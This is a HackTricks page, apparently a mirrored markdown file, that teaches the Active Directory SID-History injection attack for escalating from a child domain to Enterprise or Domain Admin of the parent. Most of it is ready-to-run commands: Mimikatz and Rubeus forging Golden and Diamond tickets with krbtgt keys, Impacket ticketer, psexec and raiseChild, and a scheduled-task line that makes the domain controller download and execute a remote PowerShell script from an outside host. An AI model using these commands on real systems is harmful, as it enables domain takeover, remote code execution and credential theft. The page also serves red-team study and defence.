mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 20:13:37 +00:00
175 lines
8.5 KiB
Markdown
175 lines
8.5 KiB
Markdown
|
# SID-History Injection
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
## SID History Injection Attack
|
||
|
|
||
|
The focus of the **SID History Injection Attack** is aiding **user migration between domains** while ensuring continued access to resources from the former domain. This is accomplished by **incorporating the user's previous Security Identifier (SID) into the SID History** of their new account. Notably, this process can be manipulated to grant unauthorized access by adding the SID of a high-privilege group (such as Enterprise Admins or Domain Admins) from the parent domain to the SID History. This exploitation confers access to all resources within the parent domain.
|
||
|
|
||
|
Two methods exist for executing this attack: through the creation of either a **Golden Ticket** or a **Diamond Ticket**.
|
||
|
|
||
|
To pinpoint the SID for the **"Enterprise Admins"** group, one must first locate the SID of the root domain. Following the identification, the Enterprise Admins group SID can be constructed by appending `-519` to the root domain's SID. For instance, if the root domain SID is `S-1-5-21-280534878-1496970234-700767426`, the resulting SID for the "Enterprise Admins" group would be `S-1-5-21-280534878-1496970234-700767426-519`.
|
||
|
|
||
|
You could also use the **Domain Admins** groups, which ends in **512**.
|
||
|
|
||
|
Another way yo find the SID of a group of the other domain (for example "Domain Admins") is with:
|
||
|
|
||
|
```powershell
|
||
|
Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
|
||
|
```
|
||
|
|
||
|
### Golden Ticket (Mimikatz) with KRBTGT-AES256
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
|
||
|
|
||
|
/user is the username to impersonate (could be anything)
|
||
|
/domain is the current domain.
|
||
|
/sid is the current domain SID.
|
||
|
/sids is the SID of the target group to add ourselves to.
|
||
|
/aes256 is the AES256 key of the current domain's krbtgt account.
|
||
|
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
|
||
|
/startoffset sets the start time of the ticket to 10 mins before the current time.
|
||
|
/endin sets the expiry date for the ticket to 60 mins.
|
||
|
/renewmax sets how long the ticket can be valid for if renewed.
|
||
|
|
||
|
# The previous command will generate a file called ticket.kirbi
|
||
|
# Just loading you can perform a dcsync attack agains the domain
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
For more info about golden tickets check:
|
||
|
|
||
|
{% content-ref url="golden-ticket.md" %}
|
||
|
[golden-ticket.md](golden-ticket.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
### Diamond Ticket (Rubeus + KRBTGT-AES256)
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```powershell
|
||
|
# Use the /sids param
|
||
|
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
|
||
|
|
||
|
# Or a ptt with a golden ticket
|
||
|
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
|
||
|
|
||
|
# You can use "Administrator" as username or any other string
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
For more info about diamond tickets check:
|
||
|
|
||
|
{% content-ref url="diamond-ticket.md" %}
|
||
|
[diamond-ticket.md](diamond-ticket.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
|
||
|
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
|
||
|
ls \\mcorp-dc.moneycorp.local\c$
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||
|
|
||
|
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
|
||
|
|
||
|
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
|
||
|
|
||
|
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
|
||
|
|
||
|
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
With the acquired permissions from the attack you can execute for example a DCSync attack in the new domain:
|
||
|
|
||
|
{% content-ref url="dcsync.md" %}
|
||
|
[dcsync.md](dcsync.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
### From linux
|
||
|
|
||
|
#### Manual with [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
# This is for an attack from child to root domain
|
||
|
# Get child domain SID
|
||
|
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
|
||
|
# Get root domain SID
|
||
|
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"
|
||
|
|
||
|
# Generate golden ticket
|
||
|
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator
|
||
|
|
||
|
# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
|
||
|
# JUST USE THE SAME USERNAME IN THE NEXT STEPS
|
||
|
|
||
|
# Load ticket
|
||
|
export KRB5CCNAME=hacker.ccache
|
||
|
|
||
|
# psexec in domain controller of root
|
||
|
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
#### Automatic using [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)
|
||
|
|
||
|
This is an Impacket script which will **automate escalating from child to parent domain**. The script needs:
|
||
|
|
||
|
* Target domain controller
|
||
|
* Creds for an admin user in the child domain
|
||
|
|
||
|
The flow is:
|
||
|
|
||
|
* Obtains the SID for the Enterprise Admins group of the parent domain
|
||
|
* Retrieves the hash for the KRBTGT account in the child domain
|
||
|
* Creates a Golden Ticket
|
||
|
* Logs into the parent domain
|
||
|
* Retrieves credentials for the Administrator account in the parent domain
|
||
|
* If the `target-exec` switch is specified, it authenticates to the parent domain's Domain Controller via Psexec.
|
||
|
|
||
|
```bash
|
||
|
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
|
||
|
```
|
||
|
|
||
|
## References
|
||
|
* [https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)
|
||
|
* [https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/](https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/)
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|